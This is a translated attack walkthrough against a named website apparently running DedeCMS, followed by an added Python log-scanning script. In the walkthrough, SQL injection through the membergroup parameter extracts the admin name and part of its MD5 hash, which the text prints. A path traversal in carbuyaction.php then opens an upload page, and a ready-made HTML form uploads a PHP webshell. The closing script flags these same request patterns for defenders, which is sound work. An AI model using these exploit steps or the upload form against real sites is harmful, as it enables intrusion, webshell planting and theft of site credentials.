① Injection vulnerability.
This site: http://www.political-security.com/
First visit the "/data/admin/ver.txt" page to get the time the system was last upgraded,
and www.political-security.com/data/mysql_error_trace.inc exposes the admin back-end.
Then visit the "/member/ajax_membergroup.php?action=post&membergroup=1" page; as the screenshot shows, the vulnerability is present.
Then add the statement.
View the admin account:
http://www.political-security.co ... &membergroup=@`

admin

View the admin password:
http://www.political-security.co ... &membergroup=@`

8d29b1ef9f8c5a5af429

What we get is 19 characters; removing the first three and the last one gives the admin's 16-character MD5:

8d2
9b1ef9f8c5a5af42

cmd5 couldn't crack it, so I had to try the second method.

② Upload vulnerability:

Just log in to the member center, then visit the page link
"/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post"

As the screenshot shows, "/plus/carbuyaction.php" has successfully invoked the upload page "/dialog/select_soft_post".

So change the extension of the PHP one-line webshell to "rar" or similar and use the submission page upload1.htm:

<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">
file:<input name="uploadfile" type="file" /><br>
newname:<input name="newname" type="text" value="myfile.Php"/>
<button class="button2" type="submit">提交</button><br><br>
</form>
or
the upload then succeeds.
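The request patterns in ① and ② seen from the site operator's side, as an added example that is not part of the original post: a Python script of my own that flags, in constructed access-log lines, reads of /data/admin/ver.txt and /data/mysql_error_trace.inc, non-numeric membergroup values sent to /member/ajax_membergroup.php, and ../ in the rs[code] parameter of /plus/carbuyaction.php. The log format, client addresses and rule names are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2012:10:00:01 +0800] "GET /data/admin/ver.txt HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2012:10:00:03 +0800] "GET /data/mysql_error_trace.inc HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2012:10:00:09 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=1 HTTP/1.1" 200 40 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2012:10:00:15 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=@%60 HTTP/1.1" 200 91 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Jan/2012:10:01:02 +0800] "POST /plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs%5Bcode%5D=..%2Fdialog%2Fselect_soft_post HTTP/1.1" 200 301 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2012:10:02:00 +0800] "GET /member/ajax_membergroup.php?action=post&membergroup=3 HTTP/1.1" 200 40 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2012:10:02:30 +0800] "GET /plus/list.php?tid=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')

# Files the writeup reads for version and back-end disclosure.
SENSITIVE_FILES = {"/data/admin/ver.txt", "/data/mysql_error_trace.inc"}

def classify(target):
    """Return a rule name for one request target, or None if it looks benign."""
    parts = urlsplit(target)
    path = unquote(parts.path).lower()
    # parse_qs decodes one layer; unquote again so double-encoded values are caught too.
    qs = {k.lower(): [unquote(v) for v in vals]
          for k, vals in parse_qs(parts.query, keep_blank_values=True).items()}
    if path in SENSITIVE_FILES:
        return "info-disclosure-probe"
    if path.endswith("/member/ajax_membergroup.php") and qs.get("action") == ["post"]:
        # A member group id should be an integer; anything else is an injection probe.
        if any(not v.isdigit() for v in qs.get("membergroup", [])):
            return "membergroup-sqli"
    if path.endswith("/plus/carbuyaction.php") and qs.get("dopost") == ["memclickout"]:
        # rs[code] is used as a file path; ".." points it outside its directory.
        if any("../" in v.replace("\\", "/") for v in qs.get("rs[code]", [])):
            return "carbuyaction-traversal"
    return None

def find_events(log_text):
    """Scan log text and return (client_ip, rule) pairs in log order."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and (rule := classify(m["target"])):
            events.append((m["ip"], rule))
    return events
```

Running find_events over a real access log and grouping the pairs by client address makes a host that trips all three rules in sequence stand out from ordinary member traffic.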